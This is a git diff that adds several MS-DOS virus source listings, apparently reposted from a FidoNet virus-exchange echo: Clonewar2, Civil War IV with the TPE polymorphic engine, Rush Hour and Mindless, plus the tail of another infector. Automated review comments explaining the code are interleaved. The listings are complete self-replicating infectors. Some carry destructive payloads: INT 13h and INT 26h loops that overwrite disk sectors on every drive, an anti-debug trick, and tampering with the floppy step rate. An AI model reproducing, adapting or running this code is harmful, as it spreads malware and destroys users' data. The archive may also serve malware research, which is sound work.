+ je close + + call put_eof ; move file ptr to EOF + + cmp ax,(0FFFFh-(code_end-codebeg)-100h) + ja close + cmp ax,code_end-codebeg+100h + jb close + + add ax,100h + mov word ptr ds:[si-(code_end-retdata)],ax + + mov ah,40h ; Flytta beg to end. + mov cx,code_end-codebeg + mov dx,si + int 21h + + mov ax,4200h ; fptr to filbeg. + xor cx,cx + xor dx,dx + int 21h + + mov ah,40h ; Write virus to beg. + mov cx,code_end-codebeg + mov dx,si + sub dx,cx + int 21h + +close: mov ax,5701h + mov cx,[si-(code_end-f_time)] + mov dx,[si-(code_end-f_date)] + int 21h + + mov ah,3Eh + int 21h ; close file, bx=file handle + + pop si + pop dx + pop ds + pop di + pop cx + pop bx + pop ax + + + jmp real21 + +put_eof: mov ax,4202h + xor dx,dx + xor cx,cx + int 21h + ret + + +int1Cnew: + + push ax + inc byte ptr cs:[counter] + mov al,30h + cmp byte ptr cs:[counter],al + jz scan + pop ax + + +slut: jmp dword ptr cs:[int1Cret] + +scan: + push bx + push cx + push di + push ds + push dx + push es + push si + + + push cs + pop ds + + cld + xor bx,bx + mov byte ptr cs:[counter],bh + mov cx,0FA0h + + mov ax,0b800h + mov es,ax + xor di,di + +again: mov al,byte ptr cs:[text+bx] + sub al,80h + repnz scasb + jnz stick + +maybe: inc di + inc bx + cmp bx,10d + jz beep + + mov al,byte ptr cs:[text+bx] + sub al,80h + scasb + jz maybe + xor bx,bx + jmp again + +beep: + xor cx,cx + mov bx,word ptr cs:[int1Cret] + mov es,word ptr cs:[int1Cret+2] + mov ax,251Ch + int 21h + +overagain: mov dx,0180h + xor bx,bx + +reset: mov ah,00h + inc bx + cmp bl,5h + jz raise + inc cx + int 13h + +hoho: mov ax,0380h + inc cx + int 13h + jc reset + jmp hoho + +raise: xor cx,cx + xor bx,bx + inc dx + cmp dl,85h + jnz hoho + jmp overagain + +stick: + pop si + pop es + pop dx + pop ds + pop di + pop cx + pop bx + pop ax + + + jmp slut + + +counter: db 00h + +text: db 'T'+80h, 'O'+80h, 'R'+80h, 'M'+80h, 'E'+80h, 'N'+80h + db 'T'+80h, 'O'+80h, 'R'+80h, '!'+80h + + ; This is what it scans the screen for --^ + +int1Cret: db 0EAh, 
00h, 00h, 00h, 00h + +code_end: ; THE END. + +code ends +end codebeg + +; +; Greetings to: Charlie, HITMAN, Wiper, Torpedo, Tortuer, WiCO, Drive Screwer +; And ALL other virus-writers! +; + +;-+- FidoPCB v1.4 [NR] +; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/Txx Specify output file type +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir35.asm b/MSDOS/Virus.MSDOS.Unknown.vir35.asm new file mode 100644 index 00000000..6f5dd19e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir35.asm 
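Review bot: The `sub_2` block is documented only by `; God what I hate that Eskimo!`, so the delta-offset trick it implements is invisible to a reader: `call sub_2` pushes the return address, `mov di,sp / mov si,ss:[di]` loads that address into SI and the two `inc sp` discard it, after which every data reference is written as `[si-(sub_2-label)]` or `[si-(code_end-label)]` relative to it. Suggested comment on the `sub_2:` line: `; SI := runtime address of sub_2 (delta offset); data is reached as [si-(sub_2-label)] from here on`. The INT 1Ch handler is equally under-documented for an archival sample: `text:` only says what is scanned for, while `scan`/`beep` show that a match of that string in video memory at B800h appears to switch into a loop of INT 13h AH=03h calls with `dl` stepping from 80h towards 85h, so a header comment naming this as the sample's trigger and payload would help anyone classifying it.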
@@ -0,0 +1,193 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 25 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : CLONWAR2.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Fred Lee, 2:283/718 (06 Nov 94 16:47) +;* To : Bryan Sullivan +;* Subj : CLONWAR2.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org +;Clonewar V2.0 +;Ŀ +; Assembly Source Listing for Clonewar V2 Companion Virus +; Copyright (c) 1993 All Rights Reserved. :) +;Ĵ +; The Clonewar is a direct action companion virus. This version is simply +; a partial code optimization of the original.... +; +; + +CSEG SEGMENT + ASSUME CS:CSEG,DS:NOTHING + + ORG 100H + +START: + jmp VIR_BEGIN ;lets get moving... + + +; db "[CloneWar2]" ;i really hate the waste... +WILDCARD DB "*.EXE",0 +FILE_EXT DB "COM",0 +FILE_FOUND DB 12 DUP(' '), 0 +FILE_CREATE DB 12 DUP(' '), 0 +SEARCH_ATTRIB DW 17H +NUM_INFECT DW 0 + + +My_Cmd: +CMD_LEN DB 13 +FILE_CLONE DB 12 DUP (' '), 0 + +; +; Read all the directory filenames and store as records in buffer. +; + +Vir_begin: + + mov sp,offset STACK_HERE ;move stack down + mov bx,sp + add bx,15 + mov cl,4 + shr bx,cl + mov ah,4ah ;deallocate rest of memory + int 21h + + mov di,OFFSET FILE_CLONE ;Point to buffer. + mov si,OFFSET FILE_FOUND + mov cx,12 + rep movsb + +Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search + mov cx,SEARCH_ATTRIB + + mov ah,4Eh ;find first matching file + int 21h + + jc EXIT ;If empty directory, exit + +; + +Store_name: + + mov di,OFFSET FILE_FOUND ;Point to buffer. + mov si,158 ;stow the file found in buffer + mov cx,12 + rep movsb + + mov di,OFFSET FILE_CREATE ;Point to buffer. + mov si,158 + mov cx,12 + rep movsb + + cld + mov di,OFFSET FILE_CREATE + mov al,'.' + mov cx,9 + repne scasb ;find the '.' 
+ + mov si,OFFSET FILE_EXT + mov cx,3 + rep movsb ;replace the .EXE with .COM + ;from buffer + +; + +Check_file: ;does the file exist? + mov dx,OFFSET FILE_CREATE + xor cx,cx + mov ax,3d00h ;Open file, read only + int 21h + jnc find_next + +; +Infect_file: ;create companion routine + + mov dx,OFFSET FILE_CREATE ;contains name of "companion" + xor cx,cx + mov ah,3ch ;construct file + int 21h + jc EXIT + + ;Write virus to companion file + xchg bx,ax + mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length + mov dx,OFFSET START + mov ah,40h ;write to file function + int 21h ;do it + + ;Close file + mov ah,3eh ;assumes bx still has file handle + int 21h + + ;Change attributes + mov dx,OFFSET FILE_CREATE ;of created file to + mov cx,3 ;(1) read only and (2) hidden + mov ax,4301h + int 21h + jmp prepare_command + +; +;...findnext... +; +find_next: + mov ah, 4fh ;find next... + int 21h + jmp store_name +; +Prepare_command: + + cld + mov di,OFFSET FILE_CLONE + mov al,0 + mov cx,12 + repne scasb ;find the end of string \0 + + mov al,0Dh ; + stosb ;replace \0 with a + + mov ax,12 ;store length of the command + sub ax,cx + mov CMD_LEN, al + +; + +Exit: + ;Run the original program + mov si, OFFSET MY_CMD + int 2Eh ;Pass command to command + ;interpreter for execution + mov ax,4C00H ;Exit to DOS + int 21h + + +END_OF_CODE = $ + +STACK_HERE EQU END_OF_CODE + 512 + +CSEG ENDS + END START + +;-+- FidoPCB v1.4 [NR] +; + Origin: Fred's Place (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/L Specify library search paths +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir36.asm b/MSDOS/Virus.MSDOS.Unknown.vir36.asm new file mode 100644 index 00000000..316d83c1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir36.asm 
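Review bot: `mov si,158` in `Store_name` is an unnamed magic number used twice, and nothing in the file says where the address comes from; it looks like the filename field of the default DTA (PSP offset 80h plus 1Eh = 9Eh = 158), but that should be confirmed and written down rather than left for the reader to derive. Suggested change: `FOUND_NAME EQU 80h+1Eh ; filename field of the default DTA filled by INT 21h/4Eh` next to the other data definitions and `mov si,FOUND_NAME` at both sites. `SEARCH_ATTRIB DW 17H` would also benefit from a comment spelling out the attribute bits it selects, since that value decides which directory entries the Find First at `Read_dir` returns.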
@@ -0,0 +1,229 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 26 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : CIVIL411.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Dr T , 2:283/718 (06 Nov 94 16:48) +;* To : Mike Nisbett +;* Subj : CIVIL411.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org +;**************************************************************************** +;* Civil War IV v1.1 (minor bugfix version) * +;* * +;* Assembled with Tasm 2.5 * +;* * +;* (c) 08-01-93 Dark Helmet, The Netherlands. * +;* The author takes no responsibilty for any damages caused by the virus * +;* * +;* This is a example virus with the TPE engine to teach you how to use * +;* the TPE engine. * +;* * +;*--------------------------------------------------------------------------* +;* * +;* Notes: * +;* * +;* This virus is NOT dedicated to Sara Gordon, but to all the innocent * +;* people who are killed in Yugoslavia. * +;* * +;* The text in the virus is taken from the song Civil War (hence the name) * +;* by Guns and Roses, Use Your Illusion II, we hope they don't mind it. * +;* * +;* The first name for the virus was NAVIGATOR II, because the virus is * +;* based on the NAVIGATOR virus (also written by me, a while back), but * +;* since I decided to put the songtext in it I renamed it to Civil War IV * +;* * +;* You need the TPE 1.3 engine to link this program. 
* * +;* * +;**************************************************************************** + + .model tiny + .radix 16 + .code + + extrn rnd_init:near + extrn rnd_get:near + extrn crypt:near + extrn tpe_top:near + + org 100h + +len equ offset tpe_top - begin + +Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h + +Begin: call virus ; calculate delta offset + +Virus: pop bp + sub bp,offset virus + + mov dx,0fe00h ; DTA instellen + mov ah,1ah + int 21h + +Restore_begin: call rnd_init ; init random generator + mov di,0100h + lea si,ds:[buffer+bp] + mov cx,06h + rep movsb + +First: lea dx,[com_mask+bp] ;get first COM file + mov ah,04eh + xor cx,cx + int 21h + +Open_file: mov ax,03d02h ;open for READ/WRITE + mov dx,0fe1eh + int 21h + mov [handle+bp],ax + xchg ax,bx + +Read_date: mov ax,05700h ;store date/time for later + int 21h ;use + mov [date+bp],dx + mov [time+bp],cx + +Check_infect: mov bx,[handle+bp] ;check if initials present in + mov ah,03fh ;file + mov cx,06h + lea dx,[buffer+bp] + int 21h + + mov al,byte ptr [buffer+bp]+3 ;Compare initials + mov ah,byte ptr [buffer+bp]+4 + cmp ax,[initials+bp] + jne infect_file ;if initials not present + ;start infecting file + +Close_file: mov bx,[handle+bp] ;close file + mov ah,3eh + int 21h + +Next_file: mov ah,4fh ;get next COM file + int 21h ;in directorie + jnb open_file + jmp exit + +Infect_file: mov ax,word ptr [cs:0fe1ah] ;get lenght of file + sub ax,03h + mov [lenght+bp],ax + mov ax,04200h ;goto begin of file + call move_pointer + +Write_jump: mov ah,40h ;Write JUMP intruction + mov cx,01h + lea dx,[jump+bp] + int 21h + + mov ah,40h ;Write JUMP offset + mov cx,02h + lea dx,[lenght+bp] + int 21h + + mov ah,40 ;Write initials to check + mov cx,02h ;for infection later + lea dx,[initials+bp] + int 21h + + mov ax,4202h ; move to end of file + call move_pointer ; for infection + +;***************************************************************************** +; T P E * 
+;***************************************************************************** + +Encrypt: push bp ; BP = delta offset + ; push delta offset on stack + ; for later use. + + mov ax,cs ; Calculate worksegment + add ax,01000h + mov es,ax ; ES point to decrypt virus + + lea dx,[begin+bp] ; DS:DX begin encryption + + mov cx,len ; virus lenght + + mov bp,[lenght+bp] ; decryption starts at this + add bp,103h ; point + + xor si,si ; distance between decryptor + ; and encrypted code is 0 bytes + + call rnd_get ; AX = random value + call crypt ; encrypt virus + + pop bp ; BP = delta offset + ; get delta offset of stack + +;****************************************************************************** +; T P E - E N D * +;****************************************************************************** + +Write_virus: mov bx,[handle+bp] + mov ah,40h + int 21h + +Restore_date: mov ax,05701h + mov bx,[handle+bp] + mov cx,[time+bp] + mov dx,[date+bp] + int 21h + +Exit: mov ax,cs + mov ds,ax + mov es,ax + mov bx,0100h ; jump to start program + jmp bx + +;---------------------------------------------------------------------------- + +move_pointer: mov bx,[handle+bp] + xor cx,cx + xor dx,dx + int 21h + ret + +;---------------------------------------------------------------------------- +v_name db "Civil War IV v1.1, (c) Jan '93 " +com_mask db "*.com",0 +handle dw ? +date dw ? +time dw ? +buffer db 090h,0cdh,020h,044h,048h,00h +initials dw 4844h +lenght dw ? +jump db 0e9h,0 +message db "For all i've seen has changed my mind" + db "But still the wars go on as the years go by" + db "With no love of God or human rights" + db "'Cause all these dreams are swept aside" + db "By bloody hands of the hypnotized" + db "Who carry the cross of homicide" + db "And history bears the scars of our Civil Wars." 
+writer db "[ DH / TridenT ]",00 + + end dummy + +;-+- PPoint 1.86 +; + Origin: - = [ Brainstorm BBS ++31 (0)20-6108189 ] = - (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/yx Extended memory swapping +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir37.asm b/MSDOS/Virus.MSDOS.Unknown.vir37.asm new file mode 100644 index 00000000..6670f454 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir37.asm 
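Review bot: The infection marker is never stated in a comment even though the file depends on it twice: `Check_infect` reads six bytes and compares bytes 3-4 (`[buffer+bp]+3` into AL, `[buffer+bp]+4` into AH) with `initials dw 4844h`, and `Write_jump` writes the same word after the E9 opcode and the 16-bit offset, so a marked host begins `E9 lo hi 44 48`. Suggested comment on the data line: `initials dw 4844h ; 'DH' marker at file offsets 3-4; tested by Check_infect, written by Write_jump`. The header also says the TPE 1.3 engine is required, but the four `extrn` symbols (`rnd_init`, `rnd_get`, `crypt`, `tpe_top`) are not defined in this file, so a note that the listing is kept as a non-linkable reference would stop someone from reporting the missing object as a repository defect.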
@@ -0,0 +1,313 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 27 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : RUSHHOUR.DSM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Dr T , 2:283/718 (06 Nov 94 16:49) +;* To : Clif Jessop +;* Subj : RUSHHOUR.DSM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org + PAGE 72,132 + TITLE Virus "RUSH HOUR" V1.0 (p) Foxi, 1986 + NAME VIRUS + +ABS0 SEGMENT AT 0 + ORG 4*10h +VIDEO_INT DW 2 DUP (?) ; Video Interrupt + + ORG 4*21h +DOS_INT DW 2 DUP (?) ; DOS Interrupt + + ORG 4*24h +ERROR_INT DW 2 DUP (?) ; ERROR Interrupt +ABS0 ENDS + +code SEGMENT + assume cs:code, ds:code, es:code + + ORG 05Ch +FCB LABEL BYTE +DRIVE DB ? +FSPEC DB 11 DUP (' ') ; Filename + ORG 6Ch +FSIZE DW 2 DUP (?) +FDATE DW ? ; date of last modifcation + +FTIME DW ? ; time of last mod + ORG 80h + DTA DW 128 DUP (?) ; Disk Transfer Area (DTA) + ORG 071Eh ; END OF THE NORMAL KEYBGR.COM + + xor ax, ax + mov es, ax ; ES points to ABS0 + assume es:ABS0 + + push cs + pop ds + + mov ax, VIDEO_INT ; store old interrupt vectors + mov bx, VIDEO_INT+2 + mov word ptr VIDEO_VECTOR, ax + mov word ptr VIDEO_VECTOR+2, bx + mov ax, DOS_INT + mov bx, DOS_INT+2 + mov word ptr DOS_VECTOR, ax + mov word ptr DOS_VECTOR+2, bx + cli + mov DOS_INT, OFFSET VIRUS ; new DOS vector points to VIRUS + + mov DOS_INT+2, cs + mov VIDEO_INT, OFFSET DISEASE ; video vector points to DISEASE + mov VIDEO_INT+2, cs + sti + + mov ah, 0 ; Get system time + int 1Ah ; read TimeOfDay (TOD) + mov TIME_0, dx ; CX:DX = number of clock ticks since midnight + + lea dx, VIRUS_ENDE + int 27h ; terminate program & remain resident (TSR) + +VIDEO_VECTOR DD (?) +DOS_VECTOR DD (?) +ERROR_VECTOR DW 2 DUP (?) +TIME_0 DW ? + +; +; VIRUS main program +; +; 1. System call AH=4BH? 
+; No: --> 2 +; Yes: Test for KEYBGR.COM on specified drive +; Already infected? +; Yes :--> 3. +; No : Infection! +; +; 2. Jump to normal DOS + +RNDVAL DB 'bfhg' +ACTIVE DB 0 ; not active +PRESET DB 0 ; first virus not active + + DB 'A:' +FNAME DB 'KEYBGR COM' + DB 0 + +VIRUS PROC FAR + assume cs:code, ds:nothing, es:nothing + + push ax + push cx + push dx + + mov ah, 0 ; check if at least 15 minutes + int 1ah ; have elapsed since installation. + + sub dx, TIME_0 + cmp dx, 16384 ; 16384 ticks on the clock=15 minutes + jl $3 + mov ACTIVE, 1 ; if so, activate virus + + $3: pop dx + pop cx + pop ax + + ; disk access because of the DOS command + ; "Load & execute program" ? + cmp ax, 4B00h + je $1 + +EXIT_1: + jmp DOS_VECTOR ; No: --> continue as normal + + $1: push es ; ES:BX --> parameter block + push bx ; DS:DX --> filename + push ds ; save registers which will be needed + push dx ; for INT 21H (AH=4Bh) + + mov DI, dx + mov DRIVE, 0 ; set the drive of the program + mov al, ds:[DI+1] ; to be executed + cmp al, ':' + jne $5 + + mov al, ds:[DI] + sub al, 'A'-1 + mov DRIVE, al + + $5: cld + push cs + pop ds + xor ax, ax + mov es, ax + assume ds:code, es:ABS0 + + mov ax, ERROR_INT ; ignore all disk "errors" + mov bx, ERROR_INT+2 ; with our own error routine + mov ERROR_VECTOR, ax + mov ERROR_VECTOR+2, bx + mov ERROR_INT, OFFSET ERROR + mov ERROR_INT+2, cs + + push cs + pop es + assume es:code + + lea dx, DTA ; DS:DX -> Disk Transfer Area (DTA) + mov ah, 1Ah ; SET DISK TRANSFER AREA ADDRESS + int 21h + mov bx, 11 ; transfer the filename + + $2: + mov al, fname-1[bx] ; into File Control Block (FCB) + mov FSPEC-1[bx], al + DEC bx + JNZ $2 + + lea dx, FCB ; open file (for writing) + mov ah, 0FH + int 21H + + cmp al, 0 + jne EXIT_0 ; file does not exist --> end + + mov BYTE PTR FCB + 20h, 0 + mov ax, FTIME ; file already infected? + cmp ax, 4800h + je EXIT_0 ; YES --> END + + mov PRESET, 1 ; (All copies are virulent !) 
+ mov SI, 100H ; write the virus in the file + + $4: + lea DI, DTA + mov cx, 128 + REP MOVSB + lea dx, FCB ; DS:DX -> opened FCB + mov ah, 15h ; SEQUENTIAL WRITE TO FCB FILE + int 21h + + cmp SI, OFFSET VIRUS_ENDE + jl $4 + + mov FSIZE, OFFSET VIRUS_ENDE - 100H + mov FSIZE+2, 0 ; set correct file size + mov FDATE, 0AA3h ; set correct date (3-5-86) + mov FTIME, 4800h ; set time (09:00:00) + + lea dx, FCB ; close file + mov ah, 10h + int 21h + + xor ax, ax + mov es, ax + assume es:ABS0 + + mov ax, ERROR_VECTOR ; reset the error interrupt + mov bx, ERROR_VECTOR+2 + mov ERROR_INT, ax + mov ERROR_INT+2, bx + + EXIT_0: + pop dx ; restore the saved registers + pop ds + pop bx + pop es + assume ds:nothing, es:nothing + + mov ax, 4B00h ; "EXEC" - LOAD AND EXECUTE PROGRAM + jmp DOS_VECTOR ; normal function execution + +VIRUS ENDP + +ERROR PROC FAR + IRET ; simply ignore all errors... + +ERROR ENDP + +DISEASE PROC FAR + assume ds:nothing, es:nothing + push ax ; Save registers + push cx + + test PRESET, 1 + jz EXIT_2 + + test ACTIVE, 1 + jz EXIT_2 + + IN al, 61h ; Enable speak (Bit 0 := 0) + AND al, 0feh + OUT 61h, al + + mov cx, 3 ; index loop cx + NOISE: ; generate Noise + mov al, RNDVAL + xor al, RNDVAL + 3 + SHL al, 1 + SHL al, 1 + RCL WORD PTR RNDVAL, 1 + RCL WORD PTR RNDVAL+2, 1 + + mov ah, RNDVAL ; output some bit + and ah, 2 ; of the feedback + IN al, 61h ; shift register + and al, 0FDh ; --> noise from speaker + OR al, ah + OUT 61H, al + + LOOP NOISE + + and al, 0FCh ; turn speaker off + OR al,1 + OUT 61H, al + + EXIT_2: + pop cx + pop ax + jmp VIDEO_VECTOR ; jump to normal VIDEO routine ... + +DISEASE ENDP + + DB 'This program is a VIRUS program.' + DB 'Once activated it has control over all' + DB 'system devices and even over all storage' + DB 'media inserted by the user. It continually' + DB 'copies itself into uninfected operating' + DB 'systems and thus spreads uncontrolled.' 
+ + DB 'The fact that the virus does not destroy any' + DB 'user programs or erase the disk is merely due' + DB 'to a philanthropic trait of the author......' + + ORG 1C2Ah + +VIRUS_ENDE LABEL BYTE + +code ends + + end + +;-+- Concord/QWK O.O1 Beta-7 +; + Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/os,/o,/op,/oiObject code: standard, standard w/overlays, Phar Lap, or IBM +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir38.asm b/MSDOS/Virus.MSDOS.Unknown.vir38.asm new file mode 100644 index 00000000..39c640f6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir38.asm 
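Review bot: The flow description in the header (`; 1. System call AH=4BH? ... Already infected? Yes :--> 3.`) refers to a step 3 that is never written, so the comment stops short of saying what happens in that case; the body shows the `je EXIT_0` path restores the saved registers and reissues the EXEC through `DOS_VECTOR` with `mov ax, 4B00h`, the same exit as the not-4Bh path. Suggested addition after step 2: `; 3. Restore registers and pass the EXEC (AX=4B00h) to the original DOS handler`. While here, the header could also collect the two markers the code relies on, since they are scattered through `VIRUS`: a host whose FCB time field already reads `4800h` (09:00:00) is skipped, and every written copy receives that time together with date `0AA3h` (3-5-86).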
@@ -0,0 +1,258 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 28 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : MINDLESS.DSM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Mark Hapershaw, 2:283/718 (06 Nov 94 16:49) +;* To : Hans Schotel +;* Subj : MINDLESS.DSM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Mark.Hapershaw@f718.n283.z2.fidonet.org +; The Mindless V1.0 Virus +; +; Type: *.COM Overwriter +; +; Programmer: Natas Kaupas + +; Notes: +; +; Read the texts that come with this for all of the necessary +; info...if you've got any questions contact me on any YAM Dist. Sites. +; +; I Couldn't Have Made This Without: +; +; Soltan Griss -Kode4 +; Data Disruptor -encrypted part +; Mr. Mike -typematic delay thing +; And Everyone I Forgot! + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + org 100h + + +MINDL proc far +start label near + db 0E9h,00h,00h + +vstart equ $ + + mov cx,09EBh ;debug killer + mov ax,0FE05h ; + jmp $-2 ; + add ah,03Bh ; + jmp $-10 ; + + push ds ;save old data segment + sub ax,ax ;put zero in ax + push ax ;save it on stack + + mov ah,2ah ;get date + int 21h + cmp al,0 ;is it a Sunday? 
+ jne rater ;no...don't format then + +doom: + mov ax,3301h ;turn off ^C Check + xor dl,dl ;0 + int 21h + + mov cx,lident ;this all has to do with the encrypted + mov si,offset ident ;message + mov di,offset dest ; +doshit: + mov al,ds:[si] ;unencrypt message + mov temp,al ; + xor byte ptr ds:[temp],01h ; + mov al,temp ; + mov [di],al ; + inc si ; + inc di ; + loop doshit ;loop back and finish it +doomb: + cmp drive,27 ;format all drives + jge boot ;done...then end (boot) + pushf ;push flags on + mov al,drive ;find drive + mov cx,sectors ;find sectors + mov dx,0 ;start at sector 0 + mov bx,offset dest ;write encrypted message + int 26h ;format + popf ;pop flags off + inc drive ;go up to next drive + jmp doomb ;repeat + +;this was originally going to boot...but for some reason it couldn't format in +;time (before the boot), so it didn't format...oh well. + +boot: + mov dl,2ch ;get system time + int 21h + and dl,0Fh ;AND 100th seconds by 0Fh + or dl,dl ;0? + jz locker ;yes..then lock up system + + mov cx,1980 ;date, 1980 + mov dx,0 ;mon/day, 0 + mov ah,2Bh ;set date + int 21h + mov cx,0 ;hrs/min, 0 + mov dx,0 ;sec, 0 + mov ah,2Dh ;set time + int 21h + mov ax,3301h ;turn ^C Check back on + mov dl,1 ;1 + int 21h + mov ax,4c00h ;end with error message 00 + int 21h + +locker: + jmp $ ;lock up computer + +rater: + mov al,dl + mov dl,0c0h ;unkown ms, really grinds on mine though! 
+ jz valid ;it must be around 15ms + ;which is slow considering default is 9ms + ;and most floppies can actually go under 6ms + +valid: + push ds ;Save the data segment + mov bx,78h ;point to pointer for floppy drive tables + mov ax,0 + mov ds,ax ;set to segment 0 + mov ax,[bx] ;get the pointer + mov bx,ax ;into the bx register + mov al,[bx] ;now get the present step rate + and al,0fh ;remove the old step rate + or al,dl ;put in the new step rate + mov [bx],al ;and put it back where it goes + mov ah,0 ;now call on the BIOS to + int 13h ;reload the set floppy disk controller + pop ds ;Reset the Data Segment + +go_on: + + push ds ;save present data segment + + mov bx,78h ;point to pointer for floppy drive tables + mov ax,0 + mov ds,ax ;set to segment 0 + mov ax,[bx] ;get the pointer + mov bx,ax ;into the bx register + mov al,[bx] ;now get the step rate + pop ds + push ax ;save the step rate on the stack + + +typematic: + mov bl,repeat ;get the parameters + mov bh,init ; + mov ax,305h ;set typematic rate and delay + int 16h ; + xor al,al ;errorlevel = 0 + +n_start: mov ah,4Eh ;Find first Com file in directory + mov dx,offset filename ;use "*.com" + int 21h + +Back: + mov ah,43h ;get rid of read only protection + mov al,0 ; + mov dx,9eh ; + int 21h ; + mov ah,43h ; + mov al,01 ; + and cx,11111110b ; + int 21h ; + + mov ax,3D01h ;Open file for writing + mov dx,9Eh ;get file name from file data area + int 21h + + mov bx,ax ;save handle in bx + mov ah,57h ;get time date + mov al,0 + int 21h + + push cx ;put in stack for later + push dx + + + mov dx,100h ;Start writing at 100h + mov cx,(vend-vstart) ;write ?? bytes + mov ah,40h ;Write Data into the file + int 21h + + + pop dx ;Restore old dates and times + pop cx + mov ah,57h + mov al,01h + int 21h + + + + mov ah,3Eh ;Close the file + int 21h + + mov ah,4Fh ;Find Next file + int 21h + + jnc Back + +done: + + int 20h ;Terminate Program + +V_Length equ vend-vstart + +drive db ? 
+sectors dw 456 + +filename db "*.c*",0 + +ident db "ZXntofrudsr!@f`horu!Lb@ggdd\!,O@U@R!J@TQ@R",13,10 + db "Uid!Lhoemdrr!Whstr!w0/1!",13,10 + +;encrypted message: +;ident db "[Youngsters Against McAffee] -NATAS KAUPAS",13,10 +; db "The Mindless Virus v1.0 ",13,10 + +lident equ $-ident +dest db [lident-1/2] dup (?) +temp db 0 + +repeat equ 250 +init equ 0 + +mindl endp + +vend equ $ + +seg_a ends + + end start + +;-+- GoldED/386 2.50.B1016+ +; + Origin: ViRUS PaRk BbS >916< 387-6159 24HouRs (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/L Specify library search paths +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir39.asm b/MSDOS/Virus.MSDOS.Unknown.vir39.asm new file mode 100644 index 00000000..044a2fcd --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir39.asm 
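Review bot: Nothing in this file records that vir40.asm, added later in the same commit as MINDLESS.ASM, appears to be a second copy of the same program: both name Natas Kaupas, and both carry the same XOR-with-1 obscured string (`ident` here, `message` there) that the comment here decodes as `[Youngsters Against McAffee] -NATAS KAUPAS` / `The Mindless Virus v1.0`. Because the archive stores the two under unrelated names, a one-line cross-reference at the top of each would keep the pair together for anyone indexing the collection, e.g. `; Companion listing: MSDOS/Virus.MSDOS.Unknown.vir40.asm (MINDLESS.ASM), a second, edited copy of this program`. The same cross-reference is needed in vir40.asm's hunk, pointing back to this file.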
